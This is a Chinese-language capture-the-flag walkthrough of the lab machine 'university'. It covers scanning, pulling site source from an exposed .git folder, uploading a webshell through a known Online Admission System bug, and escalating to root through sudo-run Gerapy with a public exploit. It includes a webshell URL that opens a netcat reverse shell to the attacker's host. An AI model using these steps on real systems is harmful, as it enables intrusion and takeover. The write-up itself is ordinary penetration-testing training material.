【OSCP】university

靶场介绍

信息收集

主机发现

nmap -sn 192.168.31.0/24

端口扫描

└─# nmap -sV -A -p- -T4 192.168.31.142
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-14 22:58 EST
Nmap scan report for 192.168.31.142
Host is up (0.00095s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey: 
|   3072 8e:ee:da:29:f1:ae:03:a5:c3:7e:45:84:c7:86:67:ce (RSA)
|   256 f8:1c:ef:96:7b:ae:74:21:6c:9f:06:9b:20:0a:d8:56 (ECDSA)
|_  256 19:fc:94:32:41:9d:43:6f:52:c5:ba:5a:f0:83:b4:5b (ED25519)
80/tcp open  http    nginx 1.18.0
|_http-server-header: nginx/1.18.0
| http-git: 
|   192.168.31.142:80/.git/
|     Git repository found!
|     Repository description: Unnamed repository; edit this file 'description' to name the...
|     Remotes:
|_      https://github.com/rskoolrash/Online-Admission-System
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
MAC Address: 08:00:27:E1:B2:29 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

目录扫描

gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://192.168.31.230 -x html,php,txt -e

这里通过.git 找到网站源码

通过源码信息，下载oas.sql ，但是里面的账号密码被改了。

权限获取

这里直接Online Admission System 的历史漏洞

可以看到里面的代理利用的正是如下页面

http://192.168.31.142/documents.php

我们上传webshell 后直接获取权限

http://192.168.31.142/studentpic/123.php?cmd=nc%20192.168.31.181%208989%20-c%20/bin/bash

权限提升

在html 目录下找到隐藏文件，里面存在密码。尝试su 到sandra 账号，成功读取到user.txt

利用gerapy 提权到root 权限

利用该exp ，我们需要先启动gerapy 服务

项目地址：https://github.com/Gerapy/Gerapy

^Csandra@MiWiFi-R4ACv2-srv:~$ sudo gerapy init
sudo: unable to resolve host MiWiFi-R4ACv2-srv: No address associated with hostname
Initialized workspace gerapy
sandra@MiWiFi-R4ACv2-srv:~$ cd gerapy/
sandra@MiWiFi-R4ACv2-srv:~/gerapy$ sudo gerapy migrate
sudo: unable to resolve host MiWiFi-R4ACv2-srv: No address associated with hostname
Operations to perform:
  Apply all migrations: admin, auth, authtoken, contenttypes, core, django_apscheduler, sessions
Running migrations:
  Applying contenttypes.0001_initial... OK
  Applying auth.0001_initial... OK
  Applying admin.0001_initial... OK
  Applying admin.0002_logentry_remove_auto_add... OK
  Applying admin.0003_logentry_add_action_flag_choices... OK
  Applying contenttypes.0002_remove_content_type_name... OK
...
  Applying sessions.0001_initial... OK
sandra@MiWiFi-R4ACv2-srv:~/gerapy$ 

在这里，我们还必须初始化一个项目“gerapy”。

然后，我们使用 root 身份运行它，以便使用EXP远程命令执行来获取 root 权限。在此之前，我创建了一个超级管理员用户

启动后成功访问到gerapy 服务

由于exp 里面的账号密码同样为login/passwd,所以这里就不需要更改了。执行后成功提权到root

原文始发于微信公众号（贝雷帽SEC）：【OSCP】university